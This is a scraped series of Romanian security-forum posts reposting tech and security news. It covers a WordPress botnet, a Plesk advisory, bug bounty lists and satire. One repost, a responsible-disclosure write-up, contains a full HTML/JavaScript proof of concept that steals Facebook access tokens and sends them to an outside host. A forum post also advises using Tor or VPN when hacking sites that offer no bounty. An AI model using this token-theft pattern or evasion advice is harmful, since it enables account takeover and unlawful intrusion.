Nytro

[h=1]Google Glass are specifica?ii oficiale, se îndreapt? c?tre primii clien?i[/h] Dorian Prodan - 16 apr 2013 Dup? ce a a?â?at curiozitatea tuturor cu detalii succinte despre ochelarii s?i inteligen?i, Google a anun?at ieri sear? c? primele exemplare Glass au p?r?sit liniile de produc?ie ?i se vor îndrepta c?tre clien?i în etape succesive. Pentru început, este vorba doar de cei care au participat anul trecut la Google I/O 2012 ?i au comandat acest produs contra sumei de 1500 de dolari. Cu aceast? ocazie, au fost publicate ?i primele specifica?ii oficiale. Acestea nu includ ?i natura procesorului folosit sau capacitatea bateriei, în acest ultim caz Google sus?inând c? ace?tia vor oferi o autonomie de 24 de ore. Google Glass include un ecran cu rezolu?ia de 640 x 360 pixeli, produc?torul afirmând c? acesta ofer? o experien?? similar? cu cea a unui ecran HD de 25” care este privit de la o distan?? de 2,5 metri. Conectivitatea include un adaptor Wi-Fi 802.11 b/g, o interfa?? Bluetooth ?i un conector Micro USB. Stocarea intern? are o capacitate de 16GB, din care 12 GB sunt disponibili utilizatorului. Camera frontal? ofer? un senzor cu o rezolu?ie de 5 MP care este capabil? s? înregistreze secven?e video 720p. Partea audio a fost tratat într-un mod ceva mai exotic, Google Glass urmând s? foloseasc? un transductor care va transmite sunetul prin rezonan?a oaselor craniului. Dup? cum se observ?, ochelarii Google Glass nu includ o conexiune de date, fiind dependen?i din acest punct de vedere de un smartphone sau o tablet? Android. În acest scop, Google a lansat ?i aplica?ia MyGlass, care necesit? Android 4.0.3 sau mai nou, ?i care va media serviciile GPS ?i SMS. Aceast? aplica?ie este înso?it? de publicarea ghidului pentru dezvoltarea aplica?iilor software, programatorii interesa?i putând afla la ce s? se a?tepte atunci când vor avea acces la API-urile necesare. Un detaliu interesant este procesarea cloud, toate aplica?iile urmând s? fie intermediate de serverele Google pentru a nu suprasolicita puterea de calcul oferit? de Glass. Sursa: Google Glass are specifica?ii oficiale, se îndreapt? c?tre primii clien?i

Hmm: Contest | tresorit

[h=2]Brute Force Attacks Build WordPress Botnet[/h]Security experts are warning that an escalating series of online attacks designed to break into poorly-secured WordPress blogs is fueling the growth of an unusually powerful botnet currently made up of more than 90,000 Web servers. Over the past week, analysts from a variety of security and networking firms have tracked an alarming uptick in so-called “brute force” password-guessing attacks against Web sites powered by WordPress, perhaps the most popular content management system in use today (this blog also runs WordPress). According to Web site security firm Incapsula, those responsible for this crime campaign are scanning the Internet for WordPress installations, and then attempting to log in to the administrative console at these sites using a custom list of approximately 1,000 of the most commonly-used username and password combinations. Incapsula co-founder Marc Gaffan told KrebsOnSecurity that infected sites will be seeded with a backdoor the lets the attackers control the site remotely (the backdoors persist regardless of whether the legitimate site owner subsequently changes his password). The infected sites then are conscripted into the attacking server botnet, and forced to launch password-guessing attacks against other sites running WordPress. Gaffan said the traffic being generated by all this activity is wreaking havoc for some Web hosting firms. “It’s hurting the service providers the most, not just with incoming traffic,” Gaffan said. “But as soon as those servers get hacked, they are now bombarding other servers with attack traffic. We’re talking about Web servers, not home PCs. PCs maybe connected to the Internet with a 10 megabit or 20 megabit line, but the best hosting providers have essentially unlimited Internet bandwidth. We think they’re building an army of zombies, big servers to bombard other targets for a bigger cause down the road.” Indeed, this was the message driven home Thursday in a blog post from Houston, Texas based HostGator, one of the largest hosting providers in the United States. The company’s data suggests that the botnet of infected WordPress installations now includes more than 90,000 compromised sites. “As I type these words, there is an on-going and highly-distributed, global attack on WordPress installations across virtually every web host in existence,” wrote HostGator’s Sean Valant. ”This attack is well organized and again very, very distributed; we have seen over 90,000 IP addresses involved in this attack.” That assessment was echoed in a blog post Thursday by CloudFlare, content delivery network based in San Francisco. Cloudflare CEO Matthew Prince said the tactics employed in this attack are similar to those used by criminals to build the so-called itsoknoproblembro/Brobot botnet which, in the Fall of 2012, was responsible for a series of rather large cyber attacks against the largest US financial institutions. “One of the concerns of an attack like this is that the attacker is using a relatively weak botnet of home PCs in order to build a much larger botnet of beefy servers in preparation for a future attack,” Prince wrote. ”These larger machines can cause much more damage in DDoS attacks because the servers have large network connections and are capable of generating significant amounts of traffic.” HostGator’s Valant urged WordPress administrators to change their passwords to something that meets the security requirements specified on the WordPress website. These requirements are fairly typical of a secure password: upper and lowercase letters, at least eight characters long, and including “special” characters (^%$#&@*). For more on picking strong passwords, see this tutorial. Users can also restrict access to wp-admin so that it is only reachable from specific IP addresses. Also, WordPress users can take advantage of a third-party plugin from Duo Security, which enables secure logins using one-time codes pushed via text message or an associated mobile app. Matthew Mullenweg, the founding developer of WordPress, suggests site administrators chose a username that is something other than “admin”. In addition, he urged WordPress.com-hosted blogs to turn on two-factor authentication, and to verify that the site is running the latest version of WordPress. “Do this and you’ll be ahead of 99% of sites out there and probably never have a problem,” Mullenweg wrote. Daniel Cid, chief technology officer of Sucuri Security, a company that helps site owners prevent and recover from security breaches, said his team isn’t seeing infected sites being used to attack others; according to Cid, most of the password brute-forcing is being conducted by desktop systems under the attackers’ control. “We saw a big increase in the number of brute force attacks (almost tripled) since previous month’s average,” Cid wrote in an instant message interview. “However, at least from our data, they are not re-using the compromised sites to build a botnet to scan others. I assume that is speculation. On the sites we looked [at] that were hacked, the attackers injected backdoors and malware on them,” including the Blackhole Exploit Kit. Cid also shared a copy of the username/password list that the attackers have been using for the brute-forcing. “The brute force attacks do not seem to be coming from servers, but from desktops,” Cid said. “However, this is still very early, since they are injecting backdoors (a variation of the Filesman backdoor) they can later use the sites to inject malware or even create a botnet and brute force other sites.” According to Sucuri, WordPress administrators who have been hacked should strongly consider taking the following steps to evict the intruders and infections: - Log in to the administrative panel and remove any unfamiliar admin users. - Change all passwords for all admin users (and make sure all legitimate accounts are protected with strong passwords this time). - Update the secret keys inside WordPress (otherwise any rogue admin user can remain logged in). - Reinstall WordPress from scratch or revert to a known, safe backup. Update, 3:05 p.m. ET: Corrected Gaffan’s title. Update, 6:29 p.m. ET: Added quotes and tips from Sucuri Security. Update, Apr. 13, 2013, 12:14 p.m. ET: Added comments from Mullenweg. Sursa: Brute Force Attacks Build WordPress Botnet — Krebs on Security

[h=2]Microsoft: Hold Off Installing MS13-036[/h]Microsoft is urging users to who haven’t installed it yet to hold off on MS13-036, a security update that the company released earlier this week to fix a dangerous security bug in its Windows operating system. The advice comes in response to a spike in complaints from Windows users who found their machines unbootable after applying the update. The MS13-036 update, first released on Tuesday, fixes four vulnerabilities in the Windows kernel-mode driver. In an advisory released April 9, the company said it had removed the download links to the patch while it investigates the source of the problem: “Microsoft is investigating behavior wherein systems may fail to recover from a reboot or applications fails to load after security update 2823324 is applied. Microsoft recommends that customers uninstall this update. As an added precaution, Microsoft has removed the download links to the 2823324 update while we investigate.” The problems with the patch appear to be centered around Windows 7 and certain applications on Windows 7, such as Kaspersky Anti-Virus. Microsoft has issued instructions on how to uninstall this update in the “resolution” section of this advisory. Sursa: Microsoft: Hold Off Installing MS13-036 — Krebs on Security

[h=2]Plesk Panel 11.0.9 privilege escalation vulnerabilities[/h]Original Release date: 10 Apr 2013 | Last revised: 10 Apr 2013 [h=3]Overview[/h] Plesk Panel 11.0.9 and possibly earlier versions contains multiple privilege escalation vulnerabilities. [h=3]Description[/h] [TABLE=class: wrapper-table] [TR] [TD]Plesk Panel contains multiple privilege escalation vulnerabilities which may allow an attacker to run arbitrary code as the root user. Special-case rules in Plesk's custom version of Apache suexec allow execution of arbitrary code as an arbitrary user id above a certain minimum value. In addition, several administrative or system accounts have a user ID above this minimum. Plesk's /usr/sbin/suexec binary (the binary may be present in additional locations, always with suexec in the filename) always allows the binary 'cgi-wrapper', bypassing restrictions on the ownership of the file to be called. Since cgi-wrapper's function is to execute a PHP script based on environment variables (and suexec does not sanitize these environment variables) this allows execution of arbitrary PHP code with a user id above a minimum user ID value that is hardcoded in the suid binary. CVE-2013-0132 The program /usr/local/psa/admin/sbin/wrapper allows the user psaadm to execute various administrative scripts with root privileges. Some of these scripts call external programs without specifying the full path. By specifying a malicious PATH environment variable, an attacker can cause the administrative scripts to call his own program instead of the intended system program. CVE-2013-0133 [/TD] [/TR] [/TABLE] [h=3]Impact[/h] [TABLE=class: wrapper-table] [TR] [TD]An authenticated attacker maybe be able to escalate their privileges to root allowing them to run arbitrary code as the root user. [/TD] [/TR] [/TABLE] [h=3]Solution[/h] We are currently unaware of a practical solution to this problem. Sursa: Vulnerability Note VU#310500 - Plesk Panel 11.0.9 privilege escalation vulnerabilities

[h=3]Remotely Hijacking an Aircraft[/h] There is a lot of buzz on the Internet about a talk at the Hack-in-the Box conference by Hugo Teso, who claims he can hack in to remotely control an airplane's avionics. He even wrote an Android app to do it. I honestly can't tell how real this is, and how much of it is the unique configuration of simulators he tested this on. On the one hand, it can't possibly be true that an aircraft avionics computer accepts outside commands. On the other hand, we've seen lots of security vulnerabilities that seem impossible to be true. Right now, I'm skeptical. EDITED TO ADD (4/12): Three good refutations. Sursa: Schneier on Security: Remotely Hijacking an Aircraft

[h=1]Video Tutorial: Installing Kali Linux on Virtual Box[/h] Author: Jeremy Druin Video Release Announcements: Twitter @webpwnized Title: Installing Kali Linux on Virtual Box with Nessus and Metasploit Link: This video is from the April 2013 workshop of the KY ISSA covering the installation of Kali Linux 1.01 on Virtual Box . Please see notes below the video. Notes: Kali version 1.01 64-bit was used in making the video but the latest version can be downloaded from Downloads | Kali Linux . Documentation on installing and using Kali is available at Kali Linux Official Documentation | Kali Linux The Kali guest virtual machine is configured with 2 GB RAM, 128 GB hard disk drive, and 128 MB of video memory A written tutorial on installing the Virtual Box guest additions can be found at Kali Linux Virtual Box guest | Kali Linux Official Documentation . The command to install packages supporting Virtual Box guest additions used in the video is apt-get update && apt-get install -y linux-headers-$(uname -r) dkms. This includes the installation of the dynamic kernel module support (dkms) packge. This is needed on some systems to compile the Virtual Box guest addition drivers. The version of Nessus used in the demo is Debian 6.0 (64 bits): Nessus-5.0.3-debian6_amd64.deb from the Nessus website Sursa: https://community.rapid7.com/community/infosec/blog/2013/04/10/video-tutorial-installing-kali-linux-on-virtual-box

[h=1]Kaspersky Internet Security 2013 – un an de zile licenta GRATUITA[/h] By Radu FaraVirusi(com) on April 14, 2013 Daca doriti sa testati noua versiune 2013 a Kaspersky Internet Security o puteti face acum pentru un an de zile in mod gratuit. Cum procedati pentru a obtine licenta GRATUITA? Accesati site-ul promotional si descarcati produsul: Kaspersky Lab

[h=2]Stealing Facebook Access Tokens with a Double Submit[/h] After the wave of OAuth bugs reported recently, It’s my turn to present a just as serious (but slightly less complicated) issue. On the Facebook App Center, we have links to numerous different apps. Some have a “Go to App” button, for apps embedded within Facebook, and others have a “Visit Website” button, for sites which connect with Facebook. The “Visit Website” button submits a POST request to ui_server.php, which generates an access token and redirects you to the site. The form is interesting in that it doesn’t present a permissions dialog (like you would have when requesting permissions via /dialog/oauth). This is presumably because the request has to be initiated by the user (due to the presence of a CSRF token), and because the permissions required are listed underneath the button. During testing, I noticed that omitting the CSRF token (fb_dtsg), and orig/new_perms generates a 500 error and doesn’t redirect you. This is expected behaviour. However, in the background, an access token is generated. Refreshing the app’s page in the App Center and hovering over “Visit Website” shows that it is now a link to the site, with your access token included. Using this bug, we can double-submit the permissions form to gain a valid access token. The first request is discarded - the token is generated in the background. The second request is sent after a specific interval (in my PoC I’ve chosen five seconds to be safe, but a wait of one second would suffice), which picks up the already generated token and redirects the user. The awesome thing about this bug is that we don’t need to piggy-back off an already existing app’s permissions like in some of the other bugs, we can specify whatever ones we want (including any of the extended permissions). When the user is sent to the final page, a snippet of their FB inbox is displayed, sweet! In a real-world example, the inbox would obviously not be presented, but logged. [h=4]Full PoC[/h] <!-- index.html --> <html> <head></head> <body> <h3>Facebook Auth PoC - Wait 5 Seconds</h3> <!-- Load the form first --> <div id="iframe-wrap"> <iframe src="frame.html" style="visibility:hidden;"></iframe> </div> <!-- Load the second after 5 seconds --> <script> setTimeout(function(){ document.getElementById('iframe-wrap').innerHTML = '<iframe src="frame.html" style="width:800px;height:500px;"></iframe>'; }, 5000); </script> </body> </html> <!-- frame.html --> <form action="https://www.facebook.com/connect/uiserver.php" method="POST" id="fb"> <input type="hidden" name="perms" value="email,user_likes,publish_actions,read_mailbox"> <input type="hidden" name="dubstep" value="1"> <input type="hidden" name="new_user_session" value="1"> <input type="hidden" name="app_id" value="359849714135684"> <input type="hidden" name="redirect_uri" value="https://fin1te.net/fb-poc/fb.php"> <input type="hidden" name="response_type" value="code"> <input type="hidden" name="from_post" value="1"> <input type="hidden" name="__uiserv_method" value="permissions.request"> <input type="hidden" name="grant_clicked" value="Visit Website"> </form> <script>document.getElementById('fb').submit();</script> [h=4]Fix[/h] Facebook has fixed this issue by redirecting any calls to uiserver.php without the correct tokens to invalid_request.php [h=4]Timeline[/h] 4th April 2013 - Issue Reported 8th April 2013 - Acknowledgment of Report 9th April 2013 - Issue Fixed Sursa: fin1te - Stealing Facebook Access Tokens with a Double Submit

INDECT – proiectul ce duce spionajul cibernetic la extrem sau salvarea cet??enilor din Europa? Publicat de Andrei Av?d?nei 14 Apr, 2013 at 10:00 am INDECT (Intelligent information system supporting observation, searching and detection for security of citizens în urban environment) este un proiect de cercetare ce implic? cercet?tori ?i oameni tehnici din Europa al c?ror scop este dezvoltarea unor solu?ii pentru automatizarea detect?rii de amenin??ri. Obiectivele primare declarate de ace?tia includ dezvoltarea unor algoritmi foarte puternici ce s? imite decizia uman? în încercarea de a combate terorismul ?i alte activit??i criminale, precum traficul de carne vie, pornografie infantil?, detec?ia situa?iilor periculoase (spre exemplu, furturile) sau detectarea obiectelor periculoase (cu?ite, pistoale) în spa?ii publice. Ace?tia sus?in c? astfel de mecanisme sunt extrem de importante pentru siguran?a public?. Tehnologiile dezvoltate de INDECT sunt împ?r?ite în trei categorii Monitorizarea inteligent? a amenin??rilor Detectarea amenin??rilor informatice Protec?ia datelor ?i a intimit??ii INDECT ?i spionajul cibernetic marca Anonymous Proiectul are greutate datorit? numelor mari ce implic? atât universit??i de renume din Europa cat ?i diverse organisme ale politiei statale din diverse ??ri ale continentului. Aparent, ca orice alt? ini?iativ? similar? totul vine în contextul sprijinirii cet??eanului doar c? o înregistrare realizat? de gruparea Anonymous prezint? proiectul INDECT dintr-o perspectiv? îngrijor?toare ce m? face, cel pu?in pe mine, s? m? gândesc de câteva ori dac? acest proiect este sau nu benefic omenirii. V? recomand s? urm?ri?i videoclipul pân? la final. Chiar avem nevoie de a?a ceva? Sincer s? fiu, nu cred. Dar cum în sângele nostru a stat mereu dorin?a de control, de a avea totul la mân? ?i manipulabil, de a avea cele mai mari “lucruri” ?i de a cuceri noi teritorii ?i frontiere, în mod indirect au sosit ?i alternativele de a face acest lucru cu for?a – armele. Putem opri un astfel de proiect? Improbabil. Chiar dac? aceast? variant? a proiectului este închis? cu siguran?? va fi continuat? într-o form? sau alta, într-un mediu sau altul pentru c? odat? ce stacheta este ridicat? e imposibil s? mai d?m înapoi. Omenirea se laud? cu dezvoltarea unora dintre cele mai letare arme de distrugere în mas?, care au trecut de toate filtrele umane ?i exist? state care vorbesc despre acest subiect cum noi, programatorii, ne-am lauda cu ultimul proiect dezvoltat. Dac? acele juc?rii au trecut, acestea ce sau cine le poate împiedica? Dar totu?i? Tot istoria ne arat? c? de?i de-a lungul timpului au fost dezvoltate numeroase tehnologii care, dac? ar sc?pa în mâna publicului larg, ar fi o catastrof? imediat, acestea au fost extrem de bine protejate ?i s-au folosit aproape responsabil, în interesul celor care le-au de?inut, interese prea neimportante oamenilor obi?nui?i. Aici m? gândesc la tehnologiile de supraveghere de la distan??, geolocalizare, mecanisme de monitorizare a traficului de pe Internet sau de la telefonul mobil samd. Sau cel pu?in informa?iile nu au fost f?cute publice. Poate ?i INDECT va ajunge a?a. Ce putem face? S? c?ut?m alternative. Sau s? a?tept?m. Sau s? ne ascundem sub o piatr?. Oricare dintre aceste variante nu va împiedica noile tehnologii s? prospere si s? ajung? s? ne controleze mai subtil dar mai bine. Personal, între un r?zboi cibernetic inteligent ?i unul cu arme de distrugere în mas?, prefer prima variant? de?i cel mai probabil imediat dup? destabilizarea acestei infrastructuri totul ar pica ?i am ajunge tot la a doua situatie. Dar acest subiect este pentru un blog cu o alt? ni??. Sursa: INDECT – proiectul ce duce spionajul cibernetic la extrem sau salvarea cet??enilor din Europa? | WORLDIT

Vom mentine aici o lista cu site-urile care au un program bug bounty. Google http://www.google.com/about/appsecurity/reward-program/ Facebook https://www.facebook.com/whitehat/bounty Mozilla http://www.mozilla.org/security/bug-bounty.html Paypal https://www.paypal.com/us/webapps/mpp/security/reporting-security-issues Secunia http://secunia.com/community/research/svcrp/ Etsy http://codeascraft.etsy.com/2012/09/11/announcing-the-etsy-security-bug-bounty-program/ Barracuda http://www.barracudalabs.com/bugbounty/ ---------------------------------------------------------------------------------------------- Site-uri care vor mentiona persoanele care le raporteaza vulnerabilitati: Adobe http://www.adobe.com/support/security/alertus.html Twitter https://twitter.com/about/security EBay http://pages.ebay.com/securitycenter/ResearchersAcknowledgement.html Microsoft http://technet.microsoft.com/en-us/security/ff852094.aspx Apple http://support.apple.com/kb/HT1318 Dropbox https://www.dropbox.com/security Reddit http://code.reddit.com/wiki/help/whitehat Github https://help.github.com/articles/responsible-disclosure-of-security-vulnerabilities Ifixit http://www.ifixit.com/Info/responsible_disclosure 37 Signals http://37signals.com/security-response Twilio http://www.twilio.com/blog/2012/03/reporting-security-vulnerabilities.html Constant Contact http://www.constantcontact.com/about-constant-contact/security/report-vulnerability.jsp Engine Yard http://www.engineyard.com/legal/responsible-disclosure-policy Lastpass https://lastpass.com/support_security.php RedHat https://access.redhat.com/knowledge/articles/66234 Acquia https://www.acquia.com/how-report-security-issue Zynga http://company.zynga.com/security/whitehats Owncloud http://owncloud.org/security/policy Tuenti http://corporate.tuenti.com/en/dev/hall-of-fame Soundcloud http://help.soundcloud.com/customer/portal/articles/439715-responsible-disclosure Nokia Siemens Networks http://www.nokiasiemensnetworks.com/about-us/responsible-disclosure Yandex Bug Bounty http://company.yandex.com/security/hall-of-fame.xml Lista originala: List of Bug Bounty program for PenTesters and Ethical Hackers - E Hacker News Lista este in curs de actualizare. Daca aveti ceva de completat, postati in acest topic si vom actualiza si aici.

RST e o comunitate cu foarte multi oameni pasionati de descoperirea unor probleme de securitate, in special in aplicatiile web. Din moment ce sunt multe persoane carora le face placere sa caute probleme de securitate, de ce sa o faca gratis si nu pentru bani? Bug Bounty Bug Bounty este un program de rasplatire a pasionatilor de securitate IT care raporteaza in mod responsabil o vulnerabilitate, folosit de mai multe companii pentru prevenirea problemelor care pot sa apara prin exploatarea vulnerabilitatilor descoperite in propriile servicii de catre utilizatorii acestora. Exista cateva companii mari (Google, Facebook...) care au decis sa porneasca un astfel de program. Rasplata poate fi atat un premiu in bani, dar si memtionarea celor care le-au descoperit intr-un "Hall of fame", sau alte premii: tricouri, licente pentru produse software etc. Vom mentine o lista cu aceste site-uri aici: https://rstforums.com/forum/67995-informatii-despre-programele-bug-bounty.rst Daca aveti informatii despre noi site-uri inscrise in program sau despre cele deja existente postati acolo pentru a mentine lista actualizata. Pentru pasionati, avantajul il reprezinta premiile pe care le pot primi prin raportarea acestor vulnerabilitati, iar pentru companii avantajul este repararea respectivelor probleme de securitate. Dar daca am gasit o problema intr-un site care nu are un program Bug Bounty? Desigur, puteti cauta probleme de securitate si in site-uri care nu au un astfel de program, insa va indreptati spre ilegalitate. Nu toate companiile considera un privilegiu descoperirea si raportarea unei probleme de securitate, astfel, chiar daca raportati o problema gasita, puteti avea probleme legale, in special daca va pasioneaza site-uri mari, guvernamentale: NASA si altele... Insa de ce sa riscati inchisoarea cand puteti fi rasplatiti pentru raportarea unei vulnerabilitati? Daca inca doriti sa va riscati libertatea, cel putin faceti-o in mod profesionist: Tor, VPN sau alte masuri de protectie si aveti mare grija cand/cum/unde "raportati" problema descoperita! Ce este aceasta categorie? Categoria este destinata persoanelor care descopera probleme de securitate in site-uri cu un program bug bounty. In cazul in care problema este descoperita intr-un serviciu care nu ofera rasplata pentru raportarea vulnerabilitatilor, detaliile (de la informatii minime la full disclosure) se pot posta in categoria ShowOff. Aici se vor posta problemele descoperite in aceste site-uri cat si premiile primite sau alte informatii care ii pot ajuta si incuraja pe altii sa se implice in astfel de activitati. PS: Am mutat doar cateva topicuri aici de la ShowOff, ca exemplu, vom muta aici topicurile de la ShowOff care se incadreaza in aceasta categorie. Imi puteti trimite PM cu topicuri specifice pentru a fi mutate aici.

Coreea de Nord, într-o satir? de la „The New Yorker“: testul cu rachet? a fost anulat din cauza Microsoft Windows 8 Publica?ia american? „The New Yorker“ are o nou? satir? din seria „The Borowitz report“ ?i noile ?inte sunt Coreea de Nord ?i Windows 8 de la Microsoft. „Agen?ia oficial? de pres? din Coreea de Nord a anun?at ast?zi c? testul cu rachet? a fost anulat din cauza problemelor cu Windows 8“, astfel începe textul din „The New Yorker“. Aceast? ?ar? este în centrul aten?iei în aceste zile în urma amenin??rilor sale, iar Andy Borowitz profit? de moment pentru a scrie o satir? în care cuprinde ?i produsul Microsoft. „Agen?iile de informa?ii au spus c? anun?ul ofer? o rar? ocazie de a vedea cum func?ioneaz? programul cu rachet? pe care îl are Coreea de Nord, care anul trecut rula pe Windows 95“, continu? Borowitz. Aceea?i agen?ie oficial? de pres? informeaz? c? testul a fost amânat pe o perioad? nedefinit?. Probabil c? pân? î?i întorc calculatoarele la Windows 95. Autorul publica?iei nu uit? s?-?i certifice informa?iile cu o surs?, cum altfel dac? nu apropiat? regimului nord-coreean. „Liderul suprem Kim Jong Un este furios din cauza problemelor cu Windows 8 ?i ia în calcul mai multe op?iuni, inclusiv aceea de a declara r?zboi Microsoft“, încheie Borowitz articolul s?u. Probabil c? echipamentele Apple sunt un pic prea scumpe. Articolul original este disponibil pe site-ul publica?iei. Sursa: Coreea de Nord, într-o satir? de la „The New Yorker“: testul cu rachet? a fost anulat din cauza Microsoft Windows 8 | adevarul.ro

1. Undefined result, functiile apelate ca parametri in apelul unei functii nu garanteaza ca prima e executata. Afiseaza "paxlozls" sau "lozlspax" in functie de compilator, apoi 40. 2. Comparatie intre numar intreg si float, la fel, undefined results, dar cel mai probabil afiseaza "RST" la infinit deoarece numerele in virgula flotanta nu sunt memorate exact, iar 0.1 poate fi memorat ca 0.09999998 sau ca 1.10000001 sau mai stiu eu cum. Exista o formula de memorare, dar nu mai stiu cum era. 3. La fel, poate afisa de 4-5 ori "HELLO" si de 5-6 ori "WORLD". Va genera si avertismente la compararea dintre un intreg si un numar in virgula flotanta. 4. Nu tin minte prioritatea operatorilor, mereu am o foaie langa mine . Dar fara a consulta tabelul, cred ca "<" are prioritate mai mare, in acest caz se afiseaza "TSR" 5. Nu imi dau seama care-i smecheria. 39? 6. NERFMETINTEAM

Pe 19 mai e deadline pentru cine vrea sa prezinte. Cine vine? Vrea cineva sa prezinte ceva?

[h=1]Epic uptime achievement unlocked. Can you beat 16 years?[/h][h=2]NetWare 3.12 server taken down after a decade and a half of duty.[/h] by Peter Bright - Mar 29 2013, 8:55pm GTBST It's September 23, 1996. It's a Monday. The Macarena is pumping out of the office radio, mid-way through its 14 week run at the top of the Billboard Hot 100, doing little to improve the usual Monday gloom. Easing yourself into the week, you idly thumb through a magazine, and read about Windows NT 4.0, released just a couple of months previous. You wonder to yourself whether Microsoft's hot new operating system might finally be worth using. Then it's down to work. Microsoft can keep its fancy GUIs and graphical server operating systems. NetWare 3.12 is where it's at: bulletproof file and print sharing. The server, named INTEL after its process, needs an update, so you install it and reboot. It comes up fine, so you get on with the rest of your day. Enlarge Axatax Sixteen and a half years later, INTEL's hard disks—a pair of full height 5.25 inch 800 MB Quantum SCSI devices—are making some disconcerting noises from their bearings, and you're tired of the complaints. It's time to turn off the old warhorse. Enlarge / It's down. It's probably not coming back up. Axatax Connection Terminated. It seems almost criminal. The server was decommissioned by one of our forum users, Axatax, as documented in this thread. Sixteen and a half years is a long time. Can any of you beat it? Listing image by Axatax Sursa: http://arstechnica.com/information-technology/2013/03/epic-uptime-achievement-can-you-beat-16-years/

[h=1]Fast-Talking Computer Hacker Just Has To Break Through Encryption Shield Before Uploading Nano-Virus[/h]News • Science & Technology • Internet • ISSUE 49•15 • Apr 9, 2013 Cipher, moments before cracking into the mainframe and declaring, “I’m in.” LOS ANGELES—After dashing off an indiscernible code on his laptop keyboard and sharply striking the enter key multiple times with his forefinger, a fast-talking, visibly tense computer hacker said that he just has to break through the encryption shield before he could upload the nano-virus, sources confirmed Tuesday. The arrogant if socially awkward hacker, a 30-year-old software-programmer-turned-cyberpunk known only as “Cipher,” reportedly told his buttoned-up yet eager employers who were hovering over him and watching his every move that breaking into the supercomputer’s mainframe would be “child’s play.” “The firewall’s a bitch, but I should be able to get around it,” Cipher said before swiftly wheeling his computer chair to an adjacent desk, clearing away the pile of empty pizza boxes and Maxim magazines and scanning the numbers and figures scrolling across two mounted flat-screen monitors. “Oh, what have we here? Looks like they updated their security system. Impressive. But not impressive enough.” “And...I’m in,” he added as the words “ACCESS GRANTED” appeared on his laptop screen. “School’s in session, bitches.” The efficiently executed hacking reportedly began at approximately 6:45 p.m. when Cipher, wearing a tight-fitting black hooded sweatshirt, skintight jeans, and black Converse with no laces, inserted a flash drive into his laptop’s USB port and said “Let the games begin” as an upload bar materialized on the screen. Sources confirmed that over the next few minutes, Cipher industriously navigated between multiple computer monitors displaying 3D-rendered images, criminal profiles, warehouse floor plans, and HTML code before brusquely swinging his chair around. “Don’t touch that!” he reportedly snapped at a client walking past a cluttered table of disassembled technological equipment, which he quickly scooped up in his arms and moved across the room. “This is expensive stuff, okay? Try to do me a favor and not break anything.” “Amateurs,” he added under his breath. When the upload bar reached a completion level of 68 percent, sources confirmed the screen froze and flashed a red message reading “TRANSMISSION ERROR,” causing a female client to ask a slyly grinning Cipher, “Is something wrong?” “They’re smarter than I thought,” Cipher reportedly said while sliding a ballpoint pen between his teeth, brushing aside a wisp of hair from his face, and muttering, “I wonder if I can just bypass the SRM altogether.” “You think you’re a clever boy, don’t you? Well, let’s see how clever you really are.” Reports indicate that after taking a swig from one of the six already opened Red Bulls on his desk, the visibly invigorated hacker quickly entered a series of memorized commands into the computer. Following a tense moment in which the screen appeared to be frozen and Cipher’s clients nervously glanced at each other, the error message disappeared from the screen and the bar resumed uploading, prompting a triumphant and relieved Cipher to bang his desk, slide back from his table on his four-wheeled desk chair, and yell, “Boom.” “Looks like someone forgot to input a certain attack signature file into a certain dynamic-link library. Such a pity,” Cipher said before explaining how he managed to determine the source of the error and improvise a solution, provoking his employers to respond, “In English, please.” “Am I moving too fast for you? You moneymen are all the same.” After deactivating the encryption shield and gaining access to the remote server, sources confirmed that Cipher declared, “Now for the fun part,” and turned up the volume on a nearby stereo. As a heavy metal song blared from the speakers, the hacker reportedly leaned back in his seat, placed his hands behind his head, and waited for the nano-virus to transfer to the computer. “Come on, come to Papa,” said a visibly pleased Cipher as the “Percentage of Virus Uploaded” bar went from 90 to 95, hovered at 99 percent for an uncomfortably long second, and then flipped to 100. “It’s a thing of beauty, my friends. Now, where’s my fucking money?” At press time, sources confirmed this is why Cipher is the best in the business. Sursa: Fast-Talking Computer Hacker Just Has To Break Through Encryption Shield Before Uploading Nano-Virus | The Onion - America's Finest News Source

Unde-i vulnerabilitatea? Vad doar un link. Se muta la gunoi.

[h=1]Dougie's C++ Tutorials[/h] Hello, welcome to my website. I'm Dougie MacLeod. On this website you will find tutorials and information about the C++ programming language. At some point I will create DirectX 9.0 and windows programming tutorials as well. [h=1]Programming Languages[/h] What is a programming language? A programming language is a language that computers understand. To use a programming language, you enter a script of textual instructions to tell a computer what to do. A high level language is a language that is fairly easy for humans to understand. As opposed to low-level languages such as assembly language. Assembly language is difficult for humans to understand, at least at a first glance and it is easier for computers because it is close to binary which is actually all that computers know. There are many computer programming languages. Languages that I know something about are Java, PHP, Visual Basic and C++. And how could I forget Game Maker?, game maker language(gml). I have been consistently programming for over 5 years and I have picked up knowledge about these languages as I have been developing various modules and applications. I have come to the point where I am very much sticking to C++ because it is games I want to create and I don't have confidence that I can make something decent with other languages. http://www.normanslaw.com/dougie/index.php

CTRL + F , "hacker", "Phrase not found" Mass-media e pe drumul cel bun.

Abordarea e stupida. Acele click-uri intr-o pagina web fac REQUEST-uri HTTP. Tu trebuie de fapt sa faci un program care face acele request-uri. In fine, pe subiect, daca tie iti place sa te complici... Ai functia asta: mouse_event function (Windows) sau functia mai "noua": SendInput function (Windows) care e mai profi dar ceva mai greu de folosit. Ca sa gasesti unde sa dai click, va trebui sa parcurgi probabil DOM-ul HTML, ceea ce cred ca e usor daca folosesti ActiveX-ul de la Internet Explorer, gasesti coordonatele in browser (top si left) si calculezi in functie de pozitia acelui <frame> al tau de Internet Explorer.

[h=1]SSH Cracking Backtrack 5 Video Tutorial[/h] SSH is a network protocol which allows you to connect the remote computer securely, SSH is just like telnet but telnet is not secure while SSH is a secure channel for communication. We have already discussed SSH before and in this tutorial I will show you how to crack a SSH to get the password because if you know the username and password then it is very for an attacker to get the remote shell of the victim. SSH security is very important because web administrator used to connect their web admin panel via SSH, people are using SSH to transfer the files. The communication might be client to client and client to server. In this tutorial I will show you how to crack the SSH and to get access on the Linux machine, the tools: Backtrack 5 R1 Hydra (THC Hydra) Mind Enjoy the video and do not forget to share it ! Spread the knowldege to get some knowledge. Sursa: SSH Cracking Backtrack 5 Video Tutorial | Ethical Hacking-Your Way To The World Of IT Security

